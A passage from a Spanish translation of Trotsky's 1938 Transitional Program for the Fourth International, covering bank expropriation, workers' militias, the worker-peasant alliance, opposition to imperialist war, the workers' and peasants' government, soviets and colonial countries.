De igual modo reivindicamos la expropiación de las compañías monopolizadoras de la industria de guerra, de los ferrocarriles, de las más importantes fuentes de materias primas, etc…

La diferencia entre estas reivindicaciones y la consigna reformista demasiado vieja de “nacionalización” consiste en que: 1) Nosotros rechazamos la indemnización; 2) Prevenimos a las masas contra los charlatanes del Frente Popular que, mientras proponen la nacionalización en palabras, siguen siendo, en los hechos, los agentes del capital; 3) Aconsejamos a las masas a contar solamente con su fuerza revolucionaria; 4) ligamos el problema de la expropiación a la cuestión del poder obrero y campesino.

La necesidad de lanzar la consigna de la expropiación en la agitación cotidiana, por consecuencia, de una manera fraccionada, y no solamente desde un punto de vista de propaganda, bajo su forma general, es provocada porque las diversas ramas de la industria se encuentran en un distinto nivel de desarrollo, ocupan lugares diferentes en la vida de la sociedad y pasan por diferentes etapas de la lucha de clases. Sólo el ascenso revolucionario general del proletariado puede poner la expropiación general de la burguesía en el orden del día. El objeto de las reivindicaciones transitorias es el de preparar al proletariado a la resolución de esta tarea.

La expropiación de los bancos privados y la estatización del sistema de créditos

El imperialismo significa la dominación del capital financiero. Al lado de los consorcios y de los trusts y frecuentemente arriba de ellos, los bancos concentran en sus manos la dirección de la economía. En su estructura, 105 bancos reflejan bajo una forma concentrada, toda la estructura del capitalismo contemporáneo: combinan la tendencia al monopolio con la tendencia a la anarquía. Organizan milagros de técnica, empresas gigantescas, trusts potentes y organizan también la vida cara, las crisis y la desocupación. Imposible dar ningún paso serio hacia adelante en la lucha contra la arbitrariedad monopolista y la anarquía capitalista si se dejan las palancas de comando de los bancos en manos de los bandidos capitalistas. Para crear un sistema único de inversión y de crédito, según un plan racional que corresponda a los intereses de toda la nación es necesario unificar todos los bancos en una institución nacional única. Sólo la expropiación de los bancos privados y la concentración de todo el sistema de crédito en manos del Estado pondrá en las manos de éste los medios necesarios, reales, es decir materiales, y no solamente ficticios y burocráticos, para la planificación económica.

La expropiación de los bancos no significa en ningún caso la expropiación de los pequeños depósitos bancarios. Por el contrario para los pequeños depositantes la banca del Estado única podrá crear condiciones más favorables que los bancos privados. De la misma manera sólo la banca del Estado podrá establecer para los campesinos, los artesanos y pequeños comerciantes condiciones de crédito privilegia­do, es decir, barato. Sin embargo, lo más importante es que, toda la economía, en primer término la industria pesada y los transportes, dirigida por un Estado mayor financiero único, sirva a los intereses vitales de los obreros y de todos los otros trabajadores.

No obstante, la estatización de los bancos sólo dará resultados favorables si el poder estatal mismo pasa de manos de los explotadores a manos de los trabajadores.

Piquetes de huelga, destacamento de combate, milicia obrera, el armamento del proletariado

Las huelgas con ocupación de fábricas son una muy seria advertencia dirigida por las masas no sólo a la burguesía sino también a las organizaciones obreras, comprendida la cuarta Internacional. En 19l9-1920, los obreros italianos ocuparon, por su propia iniciativa las fábricas señalando así a sus propios “jefes” la llegada de la revolución social. Los “jefes” no tomaron en cuenta la advertencia. Los resultados fueron la victoria del fascismo.

Las huelgas con ocupación no son todavía la toma de la fábrica a la manera italiana: pero son un paso decisivo en este camino. La crisis actual puede exacerbar extremadamente la marcha de la lucha de clases y precipitar el desenlace. No hay que creer sin embargo que una situación revolucionaria surge repentinamente. En realidad su aproximación será señalada por toda una serie de convulsiones. La ola de huelgas con ocupación de fábricas es precisamente una de ellas. La tarea de las secciones de la Cuarta Internacional es de ayudar a la vanguardia proletaria a comprender el carácter general y los ritmos de nuestra época y fecundar a tiempo la lucha de masas con consignas cada vez más resueltas y con medidas de organización para el combate.

La exacerbación de la lucha del proletariado significa la exacerbación de los métodos de resistencia por parte del capital. Las nuevas olas de huelgas con ocupación de fábricas pueden provocar y provocarán infaliblemente enérgicas medidas de reacción por parte de la burguesía. El trabajo preparatorio se conduce desde ahora en los estados mayores de los trusts. ¡Desgraciadas las organizaciones revolucionarias, desgraciado el proletariado si se deja tomar nuevamente de improviso!

La burguesía no se limita en ninguna parte a utilizar solamente la policía y el ejército oficiales. En los Estados Unidos, incluso en los períodos de “calma”, mantiene destacamentos amarillos y bandas armadas de carácter privado en las fábricas. Es preciso agregar ahora las bandas de nazis norteamericanas. La burguesía francesa en cuanto sintió la proximidad del peligro movilizó los destacamentos fascistas semilegales e ilegales, hasta en el interior del ejército oficial. Bastará que los obreros ingleses aumenten de nuevo su empuje para que de inmediato las bandas de Lord Mosley se dupliquen, tripliquen, decupliquen en número e inicien una cruzada sangrienta contra los obreros. La burguesía advierte claramente que en la época actual la lucha de clases infaliblemente tiende a transformarse en guerra civil. Los magnates y los lacayos del capital han aprendido en los ejemplos de Italia, Alemania, Austria y otros países, mucho más que los jefes oficiales del proletariado

Los políticos de la Segunda y la Tercera Internacional, al igual que los burócratas de los sindicatos conscientemente cierran los ojos ante el ejército privado dc la burguesía, pues de lo contrario no podrían mantener ni durante 24 horas su alianza con ella. Los reformistas inculcan sistemáticamente a los obreros la idea de que la sacrosanta democracia está más segura allí donde la burguesía se halla armada hasta los dientes y los obreros desarmados.

La Cuarta Internacional tiene el deber de acabar de una vez por todas con esta política servil. Los demócratas pequeño-burgueses incluso los social-demócratas, los socialistas y los anarquistas gritan más estentóreamente acerca de la lucha con el fascismo cuanto más cobardemente capitulan ante el mismo. Las bandas fascistas sólo pueden ser contrarrestadas victoriosamente por los destacamentos de obreros armados que sienten tras de sí el apoyo de millones de trabajadores. La lucha contra el fascismo no se inicia en la redacción de una hoja liberal, sino en la fábrica y termina en la calle. Los elementos amarillos y los gendarmes privados en las fábricas son las células fundamentales del ejército del fascismo. Los piquetes de huelgas son las células fundamentales del ejército del proletariado. Por allí es necesario empezar. Es preciso inscribir esta consigna en el programa del ala revolucionaria de los sindicatos. En todas partes donde sea posible, empezando por las organizaciones juveniles, es preciso constituir prácticamente milicias de autodefensa, adiestrándolas en el manejo de las armas.

La nueva ola del movimiento de masas no sólo debe servir para aumentar el número de esas milicias, sino también para unificarlas por barrios, ciudades y regiones Es preciso dar una expresión organizada al legítimo odio de los obreros en contra de los elementos rompehuelgas, las bandas de pistoleros y de fascistas. Es preciso lanzar la consigna de la milicia obrera como única garantía seria de la inviolabilidad de las organizaciones, las reuniones y la prensa obrera.

Sólo gracias a un trabajo sistemático, constante, incansable valiente en la agitación y en la propaganda, siempre en relación con la experiencia de la masa misma, pueden extirparse de su conciencia las tradiciones de docilidad y pasividad: educar destacamentos de heroicos combatientes, capaces de dar el ejemplo a todos los trabajadores, infligir una serie de derrotas tácticas a las bandas de la contrarrevolución, aumentar la confianza en sí mismos de los explotados, desacreditar el fascismo a los ojos de la pequeña burguesía y despejar el camino para la conquista del poder para el proletariado.

Engels definía el Estado “destacamentos de elementos armados”. El armamento del proletariado es un factor integrante indispensable de su lucha emancipadora. Cuando el proletariado lo quiera, hallará los caminos y los medios para armarse. También en este dominio la dirección incumbe naturalmente a las secciones de la Cuarta Internacional.

La alianza de los obreros y de los campesinos

El obrero agrícola es, en la aldea, el hermano y el compañero del obrero de la industria. Son dos partes de una sola y misma clase. Sus intereses son inseparables. El programa de las reivindicaciones transitorias de los obreros industriales es también, con tales o cuales cambios, el programa del proletariado agrícola.

Los campesinos (chacareros) representan otra clase: es la pequeña burguesía de la aldea. La pequeña burguesía se compone de diferentes capas, desde los semi-propietarios hasta los explotadores.

De acuerdo con esto, la tarea política del proletariado de la industria consiste en llevar la lucha de clases a la aldea: solamente así podrá separar sus aliados de sus enemigos.

Las peculiaridades del desarrollo nacional de cada país hallan su más viva expresión en la situación de los campesinos y parcialmente de la pequeña burguesía de la ciudad (artesanos y comerciantes) porque estas clases, por numerosas que sean, representan en el fondo sobrevivencias de formas precapitalistas de la producción. Las secciones de la Cuarta Internacional deben, de la forma más concreta posible, elaborar programas de reivindicaciones transitorias para los campesinos (chacareros) y la pequeña burguesía de la ciudad correspondiente a las condiciones de cada país. Los obreros avanzados deben aprender a dar respuestas claras y concretas a los problemas de sus futuros aliados.

En tanto siga siendo el campesino un pequeño productor “independiente”, tiene necesidad de crédito barato, de precios accesibles para las máquinas agrícolas y los abonos, de condiciones favorables de transportes, de una organización honesta para las negociaciones de los productos agrícolas. Sin embargo los bancos, los trusts, los comerciantes extorsionan al campesinado por todas partes. Sólo los campesinos pueden reprimir este pillaje, con la ayuda de los obreros. Es necesario que entren a actuar comités de chacareros pobres que, en común con los comités obreros y los comités de empleados de banco, tomaran en sus manos el control de las operaciones de transporte, de crédito y de comercio que interesan a la agricultura.

Invocando de manera mentirosa las “excesivas” exigencias de los obreros, la gran burguesía convierte artificialmente el problema del precio de las mercaderías en una cuña que introduce luego entre los obreros y los campesinos, entre los obreros y la pequeña burguesía de las ciudades. Los campesinos, el artesano y el pequeño comerciante, a diferencia del obrero, del empleado y del pequeño funcionario no pueden reclamar un aumento del salario paralelo al aumento de los precios. La lucha burocrática oficial contra la carestía de la vida no sirve más que para engañar a las masas. Los campesinos, los artesanos y los comerciantes, sin embargo, en su condición de consumidores, deben tomar una participación activa, junto con los obreros, en la política de los precios. A las prédicas de los capitalistas relativas a los gastos de producción, de transporte y de comercio, los consumidores deben responder: “muestren vuestros libros, exigimos el control sobre la política de los precios”. Los órganos de este control deben ser los comités de vigilancia de los precios, formados por delegados de las fábricas, los sindicatos, las cooperativas, las organizaciones de campesinos, los elementos de la pequeña burguesía pobre de las ciudades, de los trabajadores del servicio doméstico, etc… De este modo los obreros demostrarán a los campesinos que la razón de la elevación de los precios no consiste en los salarios altos sino en las ganancias excesivas de los capitalistas y en el derroche de la anarquía capitalista.

El programa de la nacionalización de la tierra y de la colectivización de la agricultura debe formularse de tal manera que excluya radicalmente la idea de la expropiación de los campesinos pobres o de la colectivización forzosa. El campesino continuará siendo el campesino de su lote de tierra mientras él mismo lo considere necesario y posible. Para rehabilitar el programa socialista a los ojos de los campesinos es preciso desenmascarar implacablemente los métodos stalinistas de colectivización, dictados por intereses de la burocracia y no los intereses de los campesinos y de los obreros.

La expropiación de los expropiadores tampoco significa el despojo forzoso de los artesanos pobres y de los pequeños comerciantes. Por el contrario, el control de los obreros sobre los bancos y los trusts, y con mayor razón la nacionalización de estas empresas, puede crear para la pequeña burguesía de la ciudad condiciones incompara­blemente más favorables de crédito, de compra y venta, que bajo la dominación ilimitada de los monopolios la dependencia de esas empresas respecto del capital privado será sustituida por la dependencia respecto al Estado, cuya atención a las necesidades de sus pequeños copartícipes y agentes será tanto mayor cuanto más riguroso sea el control de los obreros sobre el mismo.

La participación práctica de los campesinos explotados en el control de las distintas ramas de la economía permitirá a los campesinos decidir por sí mismo el problema de saber si les conviene o no sumarse al trabajo colectivo de la tierra, en qué plazos y en qué escala. Los obreros de la industria se comprometen a aportar en este camino toda su colaboración a los campesinos por intermedio de los sindicatos, de los comités de fábrica y, sobre todo, del gobierno obrero y campesino. La alianza que el proletariado propone no a las clases medias en general, sino a las capas explotadas de la ciudad y el campo, contra todos los explotadores, e incluso los explotadores “medios”, no puede fundarse en la coacción, sino solamente en un libre acuerdo que debe consolidarse en un “pacto” especial. Este “pacto” es precisamente el programa de reivindicaciones transitorias, libremente aceptado por las dos partes.

La lucha contra el imperialismo y contra la guerra

Toda la situación mundial, y por consecuencia también la vida política interior de los diversos países, se hallan bajo la amenaza de la guerra mundial. La catástrofe que se aproxima penetra de angustia, desde ya a las masas más profundas de la humanidad.

La II Internacional repite su política de traición de 1914 con tanta mayor convicción en cuanto la Internacional comunista desempeña ahora el papel del primer violín del patrioterismo. Desde que el peligro de guerra ha tomado un aspecto concreto, los stalinistas, superando con mucho a los pacifistas burgueses y pequeño burgueses, se han convertido en los campeones de la pretendida “defensa nacional”. La lucha revolucionaria contra la guerra recae así enteramente sobre los hombros de la IV Internacional.

La política de los Bolcheviques Leninistas en esta cuestión ha sido formulada en las tesis programáticas del Secretariado Internacional, que todavía ahora conservan todo su valor ( La IV Internacional y la Guerra, mayo de 1934). El éxito del partido revolucionario en el próximo período dependerá ante todo de su política en la cuestión de la guerra y el arte de apoyarse en la experiencia propia de las masas.

En el problema de la guerra más que en todo otro problema, la burguesía y sus agentes engañan al pueblo con abstracciones, fórmulas generales y frases patéticas: “neutralidad”, ”seguridad colectiva”, “armamentos para la defensa de la paz”, “defensa nacional”, “lucha contra el fascismo”, etc… Todas estas fórmulas se reducen, en resumidas cuentas, a que la cuestión de la guerra, vale decir, la suerte de los pueblos, debe quedar en manos de los imperialistas, de sus gobiernos, de su diplomacia, de sus Estados Mayores con todas sus intrigas y complots contra los pueblos.

La IV Internacional rechaza con indignación todas estas abstracciones que juegan entre los demócratas el mismo rol que entre los fascistas: “honor”, “sangre”, “raza”. Pero la indignación no es suficiente. Es preciso ayudar a las masas con criterios, consignas y reivindicaciones transitorias apropiadas para descubrir la realidad para distinguir lo que hay de concreto en el fondo de las abstracciones fraudulentas.

¿”Desarme”? Pero toda la cuestión del desarme consiste en saber quien desarmará y quien será desarmado. El único desarme que puede prevenir o detener la guerra es el desarme de la burguesía por los obreros. Pero para desarmar a la burguesía, es necesario que los obreros, ellos mismos, se armen.

¿“Neutralidad”? Pero el proletariado no es absolutamente neutral en la guerra entre Japón y China, o entre Alemania y la U.R.S.S. ¿Significa esto la defensa de la China y de la U.R.S.S.? Evidentemente, pero no por intermedio de los imperialistas que estrangularon a la China y a la U.R.S.S.

¿Defensa de la patria? Pero bajo esta abstracción la burguesía entiende la defensa de sus ganancias y de su pillaje. Estamos dispuestos a defender la patria de los ataques de los capitalistas extranjeros, una vez que hayamos atado de pies y manos e impedido a nuestros propios capitalistas atacar las patrias de los demás, una vez que los obreros y los campesinos sean los verdaderos amos de nuestro país; una vez que las riquezas del país pasen de manos de una ínfima minoría a las manos del pueblo; una vez que el ejército, de un instrumento de los explotadores se convierta en un instrumento de los explotados.

Es necesario saber traducir estas ideas fundamentales en ideas más particulares y más concretas, según la marcha de los acontecimientos y la orientación y estado de espíritu de las masas. Es necesario por otra parte, distinguir estrictamente del pacifismo del diplomático, del profesor, del periodista, del pacifismo del carpintero, del obrero agrícola, de la lavandera. En el primer caso, el pacifismo es la máscara del imperialismo. En el segundo es la expresión confusa de la desconfianza hacia el imperialismo.

Cuando el pequeño campesino o el obrero hablan de la defensa de la patria, se representan la defensa de su casa, de su familia y de las otras familias contra la invasión del enemigo, contra las bombas y contra los gases. El capitalismo y su periodista entienden por defensa de la patria la conquista de colonias y de mercados y la extensión, por el pillaje, de la parte “nacional” en los beneficios mundiales. El patriotismo y el pacifismo burgués son completas mentiras. En el pacifismo, lo mismo que en el patriotismo de los oprimidos, hay elementos que reflejan, de una parte el odio contra la guerra destructora y de otra parte su apego a lo que ellos creen que es su interés. Es necesario utilizar estos elementos para extraer las conclusiones revolucionarias necesarias. Es necesario saber oponer honestamente estas dos formas de pacifismo y de patriotismo.

Partiendo de estas consideraciones, la IV Internacional apoya toda reivindicación, aún insuficiente, si es capaz de llevar a las masas, aunque sea en un débil grado, a una política más activa a despertar su crítica y a reforzar su control sobre las maquinaciones de la burguesía.

Es desde este punto de vista que nuestra sección americana, sostiene, criticándola, la proposición de la institución de un referéndum sobre la cuestión de la declaración de guerra. Ninguna reforma democrática puede impedir, por ella misma, a los dirigentes provocar la guerra cuando ellos lo quieran. Es necesario hacer abiertamente esta advertencia. Pero cualesquiera que sean las ilusiones de las masas respecto al referéndum, esta reivindicación refleja la desconfianza de los obreros y los campesinos por el gobierno y el parlamento de la burguesía. Sin sostener ni desarrollar las ilusiones de las masas, es necesario apoyar con todas las fuerzas la desconfianza progresiva de los oprimidos hacia los opresores. Mientras más crezca el movimiento por el referéndum, más pronto los pacifistas burgueses se aislarán, más se desacredi­taran los traidores de la Internacional Comunista y más viva se hará la desconfianza de los trabajadores hacia los imperialistas.

Es desde este punto de vista que debe ser sostenida, en adelante, la reivindicación del derecho de voto a los dieciocho años para los hombres y mujeres. Aquel que mañana será llamado a morir por la “patria” debe tener el derecho de hacer oír su voz ahora. La lucha contra la guerra debe consistir, ante todo, en la movilización revolucionaria de la juventud.

Es necesario hacer plena luz sobre el problema de la guerra en todos sus aspectos, principalmente sobre aquel bajo el cual se presenta a las masas en un momento dado.

La guerra es una gigantesca empresa comercial, sobre todo para la industria de guerra. Es por eso que las “doscientas familias” son los primeros patriotas y los principales provocadores de la guerra. El control obrero sobre la industria de guerra es el primer paso sobre “los fabricantes” de la guerra.

A la consigna de los reformistas: impuesto sobre los beneficios de la industria de guerra, nosotros oponemos la consigna de: confiscación de las ganancias y expropiación de las empresas que trabajan para la guerra. Donde la industria de la guerra está “nacionalizada”, como en Francia, la consigna del control obrero conserva todo su valor; el proletariado tiene hacia el estado burgués la misma desconfianza que hacia el burgués individual.

¡Ni un hombre, ni un centavo para el gobierno burgués!

¡Nada de programas de armamento sino un programa de trabajos de utilidad pública!

¡Completa independencia de las organizaciones obreras del control militar-policíaco!

Es necesario arrancar de una vez por todas el destino de los pueblos de las manos de las camarillas imperialistas ávidas y despiadadas que conspiran a sus espaldas. De acuerdo con esto reivindicamos: abolición completa de la diplomacia secreta; todos los tratados y acuerdos deben ser accesibles a cada obrero y campesino. Creación de escuelas militares para la formación de oficiales salidos de las filas de los trabajadores y escogidos por las organizaciones obreras, instrucción militar de los obreros y campesinos bajo el control inmediato de comités obreros y campesinos.

Sustitución del ejército permanente, es decir del cuartel, por una milicia popular en ligazón indisoluble con las fábricas, las minas y los campos.

La guerra imperialista es la continuación y la exacerbación de la política de pillaje de la burguesía. La lucha del proletariado contra la guerra imperialista es la continuación y la exacerbación de la lucha de clase. El comienzo de la guerra cambia la situación y parcialmente los procedimientos de la lucha de clases, pero no cambia ni los objetivos ni la dirección fundamental de la misma.

La burguesía imperialista domina el mundo, es por eso que la próxima guerra, en su carácter fundamental, será una guerra imperialista. El contenido fundamental de la política del proletariado será, en consecuencia, la lucha contra el imperialismo y su guerra. El principio fundamental de esta lucha será: “El enemigo principal está en el país” o “La derrota de nuestro propio gobierno (imperialista) es el menor mal”.

Pero todos los países del mundo no son países imperialistas. Al contrario la mayoría de los países son víctimas del imperialismo. Algunos países coloniales o semi-coloniales intentarán, sin duda, utilizar la guerra para sacudir el yugo de la esclavitud. De su parte la guerra no será imperialista sino emancipadora. El deber del proletariado internacional será el de ayudar a los países oprimidos en guerra contra los opresores, este mismo deber se extiende también a la U.R.S.S y a todo el estado obrero que pueda surgir antes de la guerra. La derrota de todo gobierno imperialista en la lucha contra un estado obrero o un país colonial es el menor mal.

Los obreros de un país imperialista no pueden ayudar a un país anti-imperialista por medio de su gobierno, cualesquiera que sean, en un momento dado, las relaciones diplomáticas entre los dos países. Si los gobiernos se encuentran en alianza temporaria que por la propia naturaleza debe ser incierta, el proletariado del país imperialista debe permanecer en su posición de clase frente a su gobierno y aportar el apoyo a su aliado no imperialista por sus métodos, es decir, por los métodos de la lucha de clases internacional (agitación en favor del estado obrero y del país colonial, no solamente contra sus enemigos, sino también contra sus aliados pérfidos; boicot y huelga en ciertos casos, renuncia al boicot y la huelga en otros, etc…).

Sin dejar de sostener al país colonial y a la U.R.S.S. en la guerra, el proletariado no se solidariza, en ninguna forma, con el gobierno burgués del país colonial ni con la burocracia termidoriana de la U.R.S.S. Al contrario, mantiene su propia independencia política tanto frente a uno como frente a la otra. Ayudando a una guerra justa y progresiva el proletariado revolucionario conquista las simpatías de los trabajadores de las colonias y de la U.R.S.S. Afirma así la autoridad de la IV internacional y puede ayudar por lo tanto, mejor, a la caída del gobierno burgués en el país colonial y de la burocracia reaccionaria de la U.R.S.S.

Al principio de la guerra las secciones de la IV internacional se sentirán inevitablemente aisladas: cada guerra toma de improviso a las masas populares y las empuja del lado del aparato gubernamental. Los internacionalistas deberán marchar contra la corriente. No obstante, las devastaciones y los males de la nueva guerra, que desde los primeros meses dejarán muy atrás los sangrientos horrores de 1914-18 desilusionarán pronto a las masas. Su descontento y su rebelión crecerán por saltos. Las secciones de la IV internacional se encontrarán a la cabeza del flujo revolucionario. El programa de reivindicaciones transitorias adquirirá una ardiente actualidad. El problema de la conquista del poder por el proletariado se planteará con toda su amplitud.

Antes de agotar, o ahogar en sangre a la humanidad, el capitalismo envenena la atmósfera mundial con los vapores deletéreos del odio nacional y racial. El antisemitismo es ahora una de las convulsiones más malignas de la agonía capitalista.

La divulgación tenaz en contra de todos los prejuicios de raza y de todas las formas y matices de la arrogancia nacional del chauvinismo, en particular del antisemitismo, debe entrar en el trabajo cotidiano de todas las secciones de la IV Internacional, como el principal trabajo de educación en la lucha contra el imperialismo y la guerra. Nuestra consigna fundamental sigue siendo:

¡Proletarios de todos los países, uníos!

El gobierno obrero y campesino

La fórmula de “gobierno obrero y campesino” aparecida por primera vez en 1917 en la agitación de los bolcheviques fue definitivamente admitida después de la insurrección de Octubre. No representaba en este caso más que una denominación popular de la dictadura del proletariado, ya establecida. La importancia de esta denominación consiste sobre todo en que ponía en primer plano la idea de la alianza del proletariado y de la clase campesina colocada en la base del poder soviético.

Cuando la Internacional Comunista de los epígonos trató de hacer revivir la fórmula de “dictadura democrática de los obreros y campesinos”, enterrada por la historia, dio a la fórmula de “gobierno obrero y campesino” un contenido completamente diferente, puramente “democrático”, vale decir, burgués, oponiéndola a la dictadura del proletariado. Los bolcheviques leninistas rechazaron resueltamente la consigna de “gobierno obrero y campesino” en su interpretación democrático burguesa. Afirmaban entonces y afirman ahora que cuando el partido del proletariado renuncia a salir de los cuadros de la democracia burguesa, su alianza con la clase media no es otra cosa que un apoyo al capital, como ocurrió con los menchevique y los socialistas revolucionarios en 1917, como ocurrió con el partido comunista chino en 1925-1927 y como pasa ahora con los “frentes populares” de España, de Francia y de otros países.

En Abril-Septiembre de 1917, los bolcheviques exigían que los socialistas revolucionarios y los mencheviques rompieran su ligazón con la burguesía liberal y tomaran el poder en sus propias manos. Con esta condición los bolcheviques prometían a los mencheviques y a los socialistas revolucionarios representantes pequeño burgueses de obreros y campesinos, su ayuda revolucionaria contra la burguesía renunciando, no obstante categóricamente a entrar en el gobierno y a tomar ninguna responsabilidad política por ellos. Si los mencheviques y socialistas revolucionarios habían realmente roto con los cadetes liberales y con el imperialismo extranjero, “el gobierno obrero y campesino” creado por ellos, no hubiera hecho más que acelerar y facilitar la instauración de la dictadura del proletariado. Pero es precisamente por esto que la dirección de la democracia pequeño burguesa se opuso con todas sus fuerzas a la instauración de su propio poder. La experiencia de Rusia demuestra, la experiencia de España y de Francia confirma de nuevo, que aún en las condiciones más favorables los partidos de la democracia pequeño burguesa (socialistas revolucionarios, social demócratas, stalinistas, anarquistas) son incapaces de crear un gobierno obrero y campesino, vale decir un gobierno independiente de la burguesía.

No obstante la reivindicación de los bolcheviques dirigidas a los mencheviques y a los socialistas revolucionarios: «¡Romped con la burguesía, tomad en vuestras manos el poder!» tiene para las masas un enorme valor educativo. La negación obstinada de los mencheviques y de los socialistas revolucionarios a tomar el poder, que apareció tan trágicamente en las jornadas de julio, los perdió definitivamente en el espíritu del pueblo y preparó la victoria de los bolcheviques.

La tarea central de la Cuarta Internacional consiste en liberar al proletariado de la vieja dirección, cuyo espíritu conservador está en completa contradicción con la situación catastrófica del capitalismo en su decadencia y es el principal freno del progreso histórico. La acusación capital que la IV Internacional lanza contra las organizaciones tradicionales del proletariado es la de que ellas no quieren separarse del semi-cadáver de la burguesía.

En estas condiciones la reivindicación dirigida sistemáticamente a la vieja dirección: «¡Romped con la burguesía, tomad el poder!» es un instrumento extremada­mente importante para descubrir el carácter traidor de los partidos y organizaciones de las II y III Internacional es así como también de la Internacional de Amsterdam.

La consigna de “gobierno obrero y campesino” es empleada por nosotros, únicamente, en el sentido que tenía en 1917 en boca de los bolcheviques, es decir, como una consigna anti-burguesa y anti-capitalista, pero en ningún caso en el sentido “democrático” que posteriormente le han dado los epígonos haciendo, de ella, que era un puente a la revolución, la principal barrera en su camino.

Nosotros exigimos de todos los partidos y organizaciones que se apoyan en los obreros y campesinos, que rompan políticamente con la burguesía y tomen el carro campesino. En este camino de la lucha por el poder obrero prometemos un completo apoyo contra la reacción capitalista. Al mismo tiempo desarrollamos una agitación incansable alrededor de las reivindicaciones que deben constituir, en nuestra opinión, el programa del “gobierno obrero y campesino”.

¿Es posible la creación del gobierno obrero y campesino por las organizaciones obreras tradicionales? La experiencia del pasado demuestra, como ya lo hemos dicho, que esto es por lo menos, poco probable. No obstante no es posible negar categórica­mente a priori la posibilidad teórica de que bajo la influencia de una combinación muy excepcional (guerra, derrota, crack financiero, ofensiva revolucionaria de las masas, etc…)Los partidos pequeño burgueses sin excepción a los stalinistas, pueden llegar más lejos de lo que ellos quisieran en el camino de una ruptura con la burguesía. En cualquier caso una cosa está fuera de dudas: aún en el caso de que esa variante poco probable llegara a realizarse en alguna parte y un “gobierno obrero y campesino” – en el sentido indicado más arriba- llegara a constituirse, no representaría más que un corto episodio en el camino de la verdadera dictadura del proletariado.

Pero es inútil perderse en conjeturas. La agitación bajo la consigna de gobierno obrero y campesino tiene en todos los casos un enorme valor educativo. Y no es por azar: esta consigna, completamente general sigue la línea del desarrollo político de nuestra época (bancarrota, disgregación de los viejos partidos burgueses, quiebre de la democracia, auge del fascismo, aspiración creciente de los trabajadores a una política más activa y más ofensiva). Es por eso que cada una de nuestras reivindicaciones transitorias debe conducir a una sola y misma conclusión política: los obreros deben romper con todos los partidos tradicionales de la burguesía para establecer en común con los campesinos su propio poder.

Es imposible prever cuáles serán las etapas concretas de la movilización revolucionaria de las masas. Las secciones de la IV Internacional deben orientarse en forma crítica a cada nueva etapa y lanzar las consignas que apoyen las tendencias de los obreros a una política independiente, profundicen el carácter de clase de esta política, destruyan las ilusiones pacifistas y reformistas, refuercen la ligazón de la envergadura con las masas y preparen la toma revolucionaría del poder.

Los soviets

Los comités de fábrica son como se ha dicho un elemento de la dualidad del poder en la fábrica. Es por eso que su existencia sólo es posible bajo las condiciones de una creciente presión de las masas. Esto también es cierto para las agrupaciones de masa para la lucha contra la guerra; para los comités de control de precios y para los otros centros de movimiento cuya acción testifica, por sí misma que la lucha de clases ha rebasado el cuadro de las organizaciones tradicionales del proletariado.

No obstante estos nuevos organismos y centros sentirán su falta de cohesión y su insuficiencia. Ninguna de las reivindicaciones transitorias puede ser completamente realizada con el mantenimiento del régimen burgués. Además de la agudización de la crisis social aumentará no sólo el sufrimiento de las masas sino que también su impaciencia, su firmeza y su espíritu de ofensiva. Capas siempre nuevas de oprimidos levantarán la cabeza y lanzarán sus reivindicaciones millones de necesitados, en que los jefes reformistas nunca pensaron, comenzarán a golpear a las puertas de las organizaciones obreras. Los desocupados entrarán en el movimiento. Los obreros agrícolas, los campesinos arruinados o semi-arruinados, las capas proletarizadas de la intelectualidad, todos buscarán un reagrupamiento y una dirección. ¿Cómo armonizar las diversas reivindicaciones y formas de lucha aunque sólo sea en los limites de una ciudad? La historia ya ha respondido a este problema: por medio de los soviets (Consejos) que reúnen los representantes de todos los grupos de lucha. Nadie ha propuesto hasta ahora ninguna forma de organización y es dudoso que se pueda inventar otra. Los soviets no están ligados a ningún programa a priori. Abren sus puertas a todos los explotados. Por esta puerta pasan los representantes de las capas que son arrastradas por el torrente general de la lucha. La organización se extiende con el movimiento y se renueva constantemente y profundamente. Todas las tendencias políticas del proletariado pueden luchar por la democracia del soviets sobre la base de la más amplia democracia. Es por eso que la consigna de los soviets es el coronamiento del programa de reivindicaciones transitorias.

Los soviets no pueden nacer sino donde el movimiento de las masas entra en una etapa abiertamente revolucionaria. En tanto que eje alrededor del cual se unifican decenas de millones de trabajadores, los soviets desde el momento de su aparición se constituyen en rivales adversarios de las autoridades locales y, en seguida, del mismo gobierno central. Si el comité de fábrica crea los elementos de la dualidad del poder en la fábrica, los soviets abren un período de dualidad del poder en el país.

La dualidad del poder es a su vez el punto culminante del período de transición. Dos regímenes, el burgués y el proletario, se oponen, hostilmente uno al otro. El choque entre ambos es inevitable. De la salida de éste depende la suerte de la sociedad. En caso de derrota de la revolución, la dictadura fascista de la burguesía. En caso de victoria, el poder de los soviets, es decir, la dictadura del proletariado y la reconstrucción socialista de la sociedad.

Los países atrasados y el programa de reivindicaciones transitorias

Los países coloniales y semi-coloniales son por su misma naturaleza países atrasados. Pero estos países atrasados viven en las condiciones de la dominación mundial del imperialismo. Es por eso que su desarrollo tiene un carácter combinado: reúnen al mismo tiempo las formas económicas más primitivas y la última palabra de la técnica y de la civilización capitalista. Esto es lo que determina la política del proletariado de los países atrasados: está obligado a combinar la lucha por las tareas más elementales de la independencia nacional y la democracia burguesa con la lucha socialista contra el imperialismo mundial. Las reivindicaciones democráticas, las reivindicaciones transitorias y las tareas de la revolución socialista no están separadas en la lucha por etapas históricas sino que surgen inmediatamente las unas de las otras. Habiendo apenas comenzado a edificar sindicatos el proletariado chino se vio ya obligado a pensar en los soviets. En este sentido, el presente programa es plenamente aplicable a los países coloniales y semi-coloniales, al menos en aquellos que el proletariado es ya capaz de tener una política independiente.

Los problemas centrales de los países coloniales y semi-coloniales son: la revolución agraria, es decir, la liquidación de la herencia feudal y la independencia nacional, es decir, el sacudimiento del yugo imperialista. Estas dos tareas están estrechamente ligadas la una a la otra.

Es imposible rechazar pura y simplemente el programa democrático; es necesario que las masas por sí mismo sobrepasen este programa en la lucha. La consigna de la Asamblea Nacional (o Constituyente) conserva todo su valor en países como la China o la India. Es necesario ante todo armar a los obreros de este programa democrático. Sólo ellos pueden levantar y unir a los campesinos. Sobre la base del programa democrático revolucionario es necesario oponer los obreros a la burguesía «nacional». A una cierta etapa de la movilización de las masas bajo las consignas de la democracia revolucionaria, los soviets pueden y deben surgir. Su rol histórico en cada período dado, en particular su relación con la Asamblea Nacional, está determinado por el nivel político del proletariado, por la ligazón entre éste y la clase campesina, por el carácter de la política del proletariado. Tarde o temprano los soviets deben derribar a la democracia burguesa. Sólo ellos son capaces de llevar hasta el final la revolución democrática y abrir así la etapa de la revolución socialista.

